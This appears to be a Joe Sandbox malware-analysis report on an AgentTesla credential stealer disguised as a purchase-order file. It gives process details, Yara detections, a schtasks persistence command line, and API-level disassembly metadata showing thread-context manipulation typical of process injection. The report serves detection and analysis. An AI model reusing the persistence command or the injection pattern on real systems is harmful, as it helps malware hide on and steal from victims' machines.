                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                            Imagebase:0xcb0000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1781239060.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1781239060.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1781239060.0000000002F0B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1779040921.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1779040921.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:9
                                            Start time:05:46:59
                                            Start date:02/07/2024
                                            Path:C:\Users\user\AppData\Roaming\jDCErdK.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\jDCErdK.exe
                                            Imagebase:0x990000
                                            File size:1'000'960 bytes
                                            MD5 hash:62B9604FF6CE5A82D5270041DCD2F3FE
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1786573650.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1786573650.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 32%, ReversingLabs
                                            • Detection: 35%, Virustotal, Browse
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:10
                                            Start time:05:47:02
                                            Start date:02/07/2024
                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                            Imagebase:0x7ff693ab0000
                                            File size:496'640 bytes
                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                            Has elevated privileges:true
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:11
                                            Start time:05:47:06
                                            Start date:02/07/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmp981A.tmp"
                                            Imagebase:0x940000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:12
                                            Start time:05:47:06
                                            Start date:02/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:13
                                            Start time:05:47:07
                                            Start date:02/07/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                            Imagebase:0x450000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4107833892.000000000284C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4107833892.0000000002821000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4107833892.0000000002821000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:17
                                            Start time:05:48:18
                                            Start date:02/07/2024
                                            Path:C:\Windows\System32\wbem\WMIADAP.exe
                                            Wow64 process (32bit):false
                                            Commandline:wmiadap.exe /F /T /R
                                            Imagebase:0x7ff7f0420000
                                            File size:182'272 bytes
                                            MD5 hash:1BFFABBD200C850E6346820E92B915DC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:6.4%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:94
                                              Total number of Limit Nodes:6
                                              execution_graph 20546 84d040 20547 84d086 GetCurrentProcess 20546->20547 20549 84d0d1 20547->20549 20550 84d0d8 GetCurrentThread 20547->20550 20549->20550 20551 84d115 GetCurrentProcess 20550->20551 20552 84d10e 20550->20552 20553 84d14b 20551->20553 20552->20551 20554 84d173 GetCurrentThreadId 20553->20554 20555 84d1a4 20554->20555 20663 84d751 20664 84d714 DuplicateHandle 20663->20664 20666 84d75a 20663->20666 20665 84d726 20664->20665 20556 506f9a0 20557 506f9e0 ResumeThread 20556->20557 20559 506fa11 20557->20559 20560 844668 20561 84467a 20560->20561 20562 844686 20561->20562 20566 844779 20561->20566 20571 843e28 20562->20571 20564 8446a5 20567 84479d 20566->20567 20575 844888 20567->20575 20579 844878 20567->20579 20572 843e33 20571->20572 20587 845c44 20572->20587 20574 847048 20574->20564 20577 8448af 20575->20577 20576 84498c 20576->20576 20577->20576 20583 8444b0 20577->20583 20581 8448af 20579->20581 20580 84498c 20580->20580 20581->20580 20582 8444b0 CreateActCtxA 20581->20582 20582->20580 20584 845918 CreateActCtxA 20583->20584 20586 8459db 20584->20586 20588 845c4f 20587->20588 20591 845c64 20588->20591 20590 8470ed 20590->20574 20592 845c6f 20591->20592 20595 845c94 20592->20595 20594 8471c2 20594->20590 20596 845c9f 20595->20596 20599 845cc4 20596->20599 20598 8472c5 20598->20594 20600 845ccf 20599->20600 20602 8485cb 20600->20602 20605 84ac80 20600->20605 20601 848609 20601->20598 20602->20601 20610 84cd7c 20602->20610 20606 84ac85 20605->20606 20615 84aca0 20606->20615 20619 84acb0 20606->20619 20607 84ac8e 20607->20602 20611 84cd99 20610->20611 20612 84cdbd 20611->20612 20643 84cf28 20611->20643 20647 84cf19 20611->20647 20612->20601 20616 84acb0 20615->20616 20622 84ada8 20616->20622 20617 84acbf 20617->20607 20621 84ada8 2 API calls 20619->20621 20620 84acbf 20620->20607 20621->20620 20623 84adb9 20622->20623 20624 84addc 20622->20624 20623->20624 20630 84b030 20623->20630 20635 84b040 20623->20635 20624->20617 20625 84afe0 GetModuleHandleW 20627 84b00d 20625->20627 20626 84add4 20626->20624 20626->20625 20627->20617 20631 84b0a8 20630->20631 20632 84b03e 20630->20632 20634 84b079 20632->20634 20639 84a130 20632->20639 20634->20626 20636 84b054 20635->20636 20637 84a130 LoadLibraryExW 20636->20637 20638 84b079 20636->20638 20637->20638 20638->20626 20640 84b220 LoadLibraryExW 20639->20640 20642 84b299 20640->20642 20642->20634 20645 84cf35 20643->20645 20644 84cf6f 20644->20612 20645->20644 20651 84bae0 20645->20651 20649 84cf35 20647->20649 20648 84cf6f 20648->20612 20649->20648 20650 84bae0 2 API calls 20649->20650 20650->20648 20652 84bae5 20651->20652 20654 84dc88 20652->20654 20655 84d2dc 20652->20655 20654->20654 20656 84d2e7 20655->20656 20657 845cc4 2 API calls 20656->20657 20658 84dcf7 20657->20658 20658->20654 20659 506fe88 20660 506fecd Wow64SetThreadContext 20659->20660 20662 506ff15 20660->20662

                                              Executed Functions

                                              Function 0084D031 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 295 84d031-84d0cf GetCurrentProcess 299 84d0d1-84d0d7 295->299 300 84d0d8-84d10c GetCurrentThread 295->300 299->300 301 84d115-84d149 GetCurrentProcess 300->301 302 84d10e-84d114 300->302 303 84d152-84d16d call 84d618 301->303 304 84d14b-84d151 301->304 302->301 308 84d173-84d1a2 GetCurrentThreadId 303->308 304->303 309 84d1a4-84d1aa 308->309 310 84d1ab-84d20d 308->310 309->310
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0084D0BE
                                              • GetCurrentThread.KERNEL32 ref: 0084D0FB
                                              • GetCurrentProcess.KERNEL32 ref: 0084D138
                                              • GetCurrentThreadId.KERNEL32 ref: 0084D191
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1692244845.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_840000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: 38990690b3370fe287d6a73ef8530c820ef2fa3dc21c7ef390c6b4a24562e84e
                                              • Instruction ID: 6a94846f31aef22a5a3315e3e12b6fbcfcccfd60d110324c908c562de5cf3cfc
                                              • Opcode Fuzzy Hash: 38990690b3370fe287d6a73ef8530c820ef2fa3dc21c7ef390c6b4a24562e84e
                                              • Instruction Fuzzy Hash: 3F5134B09003498FDB14DFA9D548BDEBBF1FB48304F20846AE459A73A1DB749984CB65
                                              Function 0084D040 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 317 84d040-84d0cf GetCurrentProcess 321 84d0d1-84d0d7 317->321 322 84d0d8-84d10c GetCurrentThread 317->322 321->322 323 84d115-84d149 GetCurrentProcess 322->323 324 84d10e-84d114 322->324 325 84d152-84d16d call 84d618 323->325 326 84d14b-84d151 323->326 324->323 330 84d173-84d1a2 GetCurrentThreadId 325->330 326->325 331 84d1a4-84d1aa 330->331 332 84d1ab-84d20d 330->332 331->332
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0084D0BE
                                              • GetCurrentThread.KERNEL32 ref: 0084D0FB
                                              • GetCurrentProcess.KERNEL32 ref: 0084D138
                                              • GetCurrentThreadId.KERNEL32 ref: 0084D191
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1692244845.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_840000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: fe4b830d9567cec3c4919aa931bb6fc14ceb7aca16916b208ab6979d5e4a494c
                                              • Instruction ID: 5d02827dac463b7bb77a8c2787bb941cedf72a9611dfc0b7707b366e93d28800
                                              • Opcode Fuzzy Hash: fe4b830d9567cec3c4919aa931bb6fc14ceb7aca16916b208ab6979d5e4a494c
                                              • Instruction Fuzzy Hash: DB5123B09003498FDB14DFAAD548B9EBBF1FB48304F208469E859A7361DB749988CB65
                                              Function 0084ADA8 Relevance: 1.7, APIs: 1, Instructions: 210COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 362 84ada8-84adb7 363 84ade3-84ade7 362->363 364 84adb9-84adc6 call 84a0cc 362->364 366 84ade9-84adf3 363->366 367 84adfb-84ae3c 363->367 371 84addc 364->371 372 84adc8 364->372 366->367 373 84ae3e-84ae46 367->373 374 84ae49-84ae57 367->374 371->363 419 84adce call 84b030 372->419 420 84adce call 84b040 372->420 373->374 375 84ae59-84ae5e 374->375 376 84ae7b-84ae7d 374->376 378 84ae60-84ae67 call 84a0d8 375->378 379 84ae69 375->379 381 84ae80-84ae87 376->381 377 84add4-84add6 377->371 380 84af18-84af94 377->380 385 84ae6b-84ae79 378->385 379->385 412 84af96-84afbe 380->412 413 84afc0-84afd8 380->413 382 84ae94-84ae9b 381->382 383 84ae89-84ae91 381->383 386 84ae9d-84aea5 382->386 387 84aea8-84aeaa call 84a0e8 382->387 383->382 385->381 386->387 391 84aeaf-84aeb1 387->391 393 84aeb3-84aebb 391->393 394 84aebe-84aec3 391->394 393->394 395 84aec5-84aecc 394->395 396 84aee1-84aeee 394->396 395->396 398 84aece-84aede call 84a0f8 call 84a108 395->398 402 84aef0-84af0e 396->402 403 84af11-84af17 396->403 398->396 402->403 412->413 414 84afe0-84b00b GetModuleHandleW 413->414 415 84afda-84afdd 413->415 416 84b014-84b028 414->416 417 84b00d-84b013 414->417 415->414 417->416 419->377 420->377
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0084AFFE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1692244845.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_840000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 69a73bb0d8c5b77b2d58909f34b4cf94d39c7be0c126fb394b28d9041cba70c4
                                              • Instruction ID: 65fe662482454585522e8de86d07cd875ac22535a5df9ce589e1b4f2d248b0e1
                                              • Opcode Fuzzy Hash: 69a73bb0d8c5b77b2d58909f34b4cf94d39c7be0c126fb394b28d9041cba70c4
                                              • Instruction Fuzzy Hash: 15814970A00B098FD728DF29D44579ABBF1FF48304F00892DD49ADBA51D775E94ACB91
                                              Function 008444B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 421 8444b0-8459d9 CreateActCtxA 424 8459e2-845a3c 421->424 425 8459db-8459e1 421->425 432 845a3e-845a41 424->432 433 845a4b-845a4f 424->433 425->424 432->433 434 845a60 433->434 435 845a51-845a5d 433->435 437 845a61 434->437 435->434 437->437
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 008459C9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1692244845.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_840000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 7891642480e9e19785cdb5fff25ea1879b8f173ded58e0d1c399d07bded15206
                                              • Instruction ID: 4f786cef9d156f887bbc7eb8f7cd12114e4edb765216032cc0252ad36fb099e9
                                              • Opcode Fuzzy Hash: 7891642480e9e19785cdb5fff25ea1879b8f173ded58e0d1c399d07bded15206
                                              • Instruction Fuzzy Hash: C741D2B0C0062DCBDB24CFA9C884B8EBBB5FF48304F24816AD409AB256DB755949CF90
                                              Function 0084590D Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 438 84590d-8459d9 CreateActCtxA 440 8459e2-845a3c 438->440 441 8459db-8459e1 438->441 448 845a3e-845a41 440->448 449 845a4b-845a4f 440->449 441->440 448->449 450 845a60 449->450 451 845a51-845a5d 449->451 453 845a61 450->453 451->450 453->453
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 008459C9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1692244845.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_840000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 1f172e3437cce45963c2fa4ebf099d48dd8c8cc2e64bd3488a107ad5424a688d
                                              • Instruction ID: 1b874e19f07b5493d36fede12e612547ece79a98902f19fd0165edbe3380953b
                                              • Opcode Fuzzy Hash: 1f172e3437cce45963c2fa4ebf099d48dd8c8cc2e64bd3488a107ad5424a688d
                                              • Instruction Fuzzy Hash: 0241B2B0C0061DCBDB24CFA9C884BCEBBB5BF49304F24819AD449AB255DB755949CF90
                                              Function 0084D751 Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 454 84d751-84d758 455 84d714-84d724 DuplicateHandle 454->455 456 84d75a-84d87e 454->456 457 84d726-84d72c 455->457 458 84d72d-84d74a 455->458 457->458
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0084D717
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1692244845.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_840000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 94af651b2924db93b2ac944f987724fe0173d32e2337189f22c5f6435eb7a579
                                              • Instruction ID: 1039d1e022868cc6edc15a8ec418331d3689024a439bdc76c904676be928a549
                                              • Opcode Fuzzy Hash: 94af651b2924db93b2ac944f987724fe0173d32e2337189f22c5f6435eb7a579
                                              • Instruction Fuzzy Hash: 16314F747443809FE7049F60E865BA93FA2F788310F11853AE915DB3E4CEB8584ADF20
                                              Function 0084D689 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 472 84d689-84d724 DuplicateHandle 473 84d726-84d72c 472->473 474 84d72d-84d74a 472->474 473->474
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0084D717
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1692244845.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_840000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 6b56278730c928b0044c4e932ac6238143803d5d18f150d976f3aef2fd2f02be
                                              • Instruction ID: da873926d1fd703aac80ab1a41f9736ea89f9e00269d62c90f6d6ad51c050fff
                                              • Opcode Fuzzy Hash: 6b56278730c928b0044c4e932ac6238143803d5d18f150d976f3aef2fd2f02be
                                              • Instruction Fuzzy Hash: 6E2103B5900208DFDB10CFAAD484ADEBFF5FB48314F10801AE918A3310C374AA44CFA1
                                              Function 0506FE88 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 477 506fe88-506fed3 479 506fed5-506fee1 477->479 480 506fee3-506ff13 Wow64SetThreadContext 477->480 479->480 482 506ff15-506ff1b 480->482 483 506ff1c-506ff4c 480->483 482->483
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0506FF06
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: b1dd8ccd29b63842f60eabd54905868f29668a24b8283aa796e13d603220a6ec
                                              • Instruction ID: 26b5744c0bc118d72ea07ab776c8619ff83e7bb47822db4ff13fa089b1ac8af5
                                              • Opcode Fuzzy Hash: b1dd8ccd29b63842f60eabd54905868f29668a24b8283aa796e13d603220a6ec
                                              • Instruction Fuzzy Hash: 222135B19043098FDB10DFAAD4857EEBFF4EF48324F10842AD459A7245CB78A984CFA4
                                              Function 0084D690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 487 84d690-84d724 DuplicateHandle 488 84d726-84d72c 487->488 489 84d72d-84d74a 487->489 488->489
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0084D717
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1692244845.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_840000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: a5dfe663b1b7f712229d43567ed650da0dfd0d560970a595d54805689c531714
                                              • Instruction ID: c46715323af4529df54f26f65dba67176107ac5f9b0a5703798f0e4bcab4f153
                                              • Opcode Fuzzy Hash: a5dfe663b1b7f712229d43567ed650da0dfd0d560970a595d54805689c531714
                                              • Instruction Fuzzy Hash: 3921E2B5900248DFDB10CFAAD984ADEBBF8FB48320F14801AE918A3350D374A944CFA5
                                              Function 0084A130 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 492 84a130-84b260 494 84b262-84b265 492->494 495 84b268-84b297 LoadLibraryExW 492->495 494->495 496 84b2a0-84b2bd 495->496 497 84b299-84b29f 495->497 497->496
                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0084B079,00000800,00000000,00000000), ref: 0084B28A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1692244845.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_840000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 2fdfb6e692f85c6ba36c2ddcdca13a13c3886db785c07a237b335ca1f41d22f6
                                              • Instruction ID: 19f73c8c89200561317fea524f719d7ba7ab071b6d4a6185f047f5f9ffa9cf9e
                                              • Opcode Fuzzy Hash: 2fdfb6e692f85c6ba36c2ddcdca13a13c3886db785c07a237b335ca1f41d22f6
                                              • Instruction Fuzzy Hash: A81114B690031C9FDB20CFAAD444ADEFBF4FB48310F10842AD519A7210C3B5A944CFA5
                                              Function 0084B218 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 500 84b218-84b260 501 84b262-84b265 500->501 502 84b268-84b297 LoadLibraryExW 500->502 501->502 503 84b2a0-84b2bd 502->503 504 84b299-84b29f 502->504 504->503
                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0084B079,00000800,00000000,00000000), ref: 0084B28A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1692244845.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_840000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: e1cdd357224518446dc226b1bb5e4133988d400a53db0ee90fe229307f0bdaff
                                              • Instruction ID: 287872bf269c9790ea550c56c1abf1ac32094a798098c0e30adc67fef56c2e4b
                                              • Opcode Fuzzy Hash: e1cdd357224518446dc226b1bb5e4133988d400a53db0ee90fe229307f0bdaff
                                              • Instruction Fuzzy Hash: B71123B68003199FCB20CFAAC484ADEFBF4FB48310F10842AD519A7610C3B5A949CFA5
                                              Function 0506F9A0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 507 506f9a0-506fa0f ResumeThread 510 506fa11-506fa17 507->510 511 506fa18-506fa3d 507->511 510->511
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1720394488.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5060000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: fef545f830caf33fcdbf9b1340bf3b1f011248c68c69f7d0138ddf027d8069db
                                              • Instruction ID: f6cd2eb0d3cdc38a352ce1b136d9f5ce6ba8b9e64a2c96836962afde067e3878
                                              • Opcode Fuzzy Hash: fef545f830caf33fcdbf9b1340bf3b1f011248c68c69f7d0138ddf027d8069db
                                              • Instruction Fuzzy Hash: 5E1136B5D003498FCB20DFAAD4457DEFBF9EB88324F20842AD459A7254CB75A944CFA4
                                              Function 0084AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 515 84af98-84afd8 516 84afe0-84b00b GetModuleHandleW 515->516 517 84afda-84afdd 515->517 518 84b014-84b028 516->518 519 84b00d-84b013 516->519 517->516 519->518
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0084AFFE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1692244845.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_840000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: a54281097d155d4cdeb1837a7277d6a99aadae614890e5b3aee201f6744951de
                                              • Instruction ID: 685f15fafff6cd3c989a37a5b151fbcdb923dd3265898fc3c67adfb1aca5e624
                                              • Opcode Fuzzy Hash: a54281097d155d4cdeb1837a7277d6a99aadae614890e5b3aee201f6744951de
                                              • Instruction Fuzzy Hash: 52110FB5C006498FCB24CF9AC444ADEFBF4EB88324F10842AD829A7610D379A545CFA1
                                              Function 0075D68C Relevance: .1, Instructions: 77COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1691931844.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_75d000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c5fd6ae271866d5cc6331dffb0913b6081847b6b910c623c6be142569598cfe2
                                              • Instruction ID: 2739e72a2c8bb734f3d2fb29a049b537fb43c624835978a62cd5ecd3f1707c79
                                              • Opcode Fuzzy Hash: c5fd6ae271866d5cc6331dffb0913b6081847b6b910c623c6be142569598cfe2
                                              • Instruction Fuzzy Hash: F6212471500240DFCB259F14D9C4B56BFA5FB88315F208669ED090B256C37ACC1ACBA1
                                              Function 0075D3D8 Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1691931844.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_75d000_purchase order - PO-011024-201.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 83755382f8de49d2f743a98829d0a0869c031d33b5eb314093fee055251c60fe
                                              • Instruction ID: 39bfd49944be1db7d555bb3e56cac5141420a82089443888d0f1077eda44a381
                                              • Opcode Fuzzy Hash: 83755382f8de49d2f743a98829d0a0869c031d33b5eb314093fee055251c60fe
                                              • Instruction Fuzzy Hash: D82145B1100280DFDB24DF04C9C0B66BF65FB98325F20C169EC090B256C37AEC4ACAA2
                                              Function 0076D1D4 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
